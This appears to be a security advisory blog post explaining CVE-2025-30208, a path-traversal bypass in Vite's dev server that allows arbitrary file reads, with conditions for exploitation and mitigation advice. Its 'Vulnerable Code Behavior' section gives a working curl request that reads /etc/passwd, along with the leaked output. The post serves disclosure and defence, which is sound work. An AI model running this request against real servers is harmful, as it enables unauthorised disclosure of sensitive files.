Home OffSec
  • Pricing
Enroll now Sign in Search Contact us
Blog

/

CVE-2025-30208 – Vite Arbitrary File Read via @fs Path Traversal Bypass

Research & Tutorials

Jul 31, 2025

CVE-2025-30208 – Vite Arbitrary File Read via @fs Path Traversal Bypass

Discover CVE-2025-30208, a critical arbitrary file read vulnerability in the Vite development server. Learn how remote attackers exploit @fs URL handling to access sensitive files.

OffSec Team OffSec Team

1 min read

Overview

CVE-2025-30208 is an arbitrary file read vulnerability in the Vite development server. This vulnerability allows remote, unauthenticated attackers to access arbitrary files on the server’s filesystem by abusing Vite’s @fs URL handling.

  • CVE ID: CVE-2025-30208
  • Severity: Medium
  • CVSS Score: 5.3
  • EPSS Score: 75.83%
  • Impact: Information Disclosure
  • Attack Vector: Network
  • Authentication Required: No
  • Vulnerable Component: @fs path handler in the Vite Dev Server

This issue affects applications running Vite in development mode, exposing sensitive server-side files if the dev server is accessible remotely.

Technical Breakdown

Vite supports special paths like /@fs/absolute/path to import files directly from the filesystem during development. Normally, Vite restricts access to files outside its allow list (i.e., project root).

However, by appending ?import&raw?? to the request, an attacker can bypass this protection and force Vite to read and return arbitrary file contents as a raw ES module export.

Conditions for Exploitation

  • The application is running Vite dev server (typically on port 5173).
  • The server is remotely accessible (e.g., exposed over the internet or intranet).
  • The attacker can issue crafted HTTP GET requests to the dev server.
  • The target file is readable by the user running the Vite process.

Vulnerable Code Behavior

Expected behavior:

$ curl "http://localhost:5173/@fs/etc/passwd"
# => 403 Restricted

Security bypass (vulnerable):

$ curl "http://localhost:5173/@fs/etc/passwd?import&raw??"

# Response
export default "root:x:0:0:root:/root:/bin/bash\nuser:x:1000:1000:user:/home/user:/bin/bash\n";
//# sourceMappingURL=data:application/json;base64,...

The double question marks (??) confuse Vite’s import parser, bypassing the default allow list restriction and enabling arbitrary file disclosure. The server responds with file content wrapped in an ES module export default.

Mitigation

  • Never expose Vite’s dev server to the public internet.
  • Upgrade Vite to the latest patched version where this bypass is fixed.
  • Consider running the dev server behind a local-only proxy or with strict firewall rules.

References

Stay in the know: Become an OffSec Insider

Stay in the know: Become an OffSec Insider

Get the latest updates about resources, events & promotions from OffSec!

Latest from OffSec

View all blogs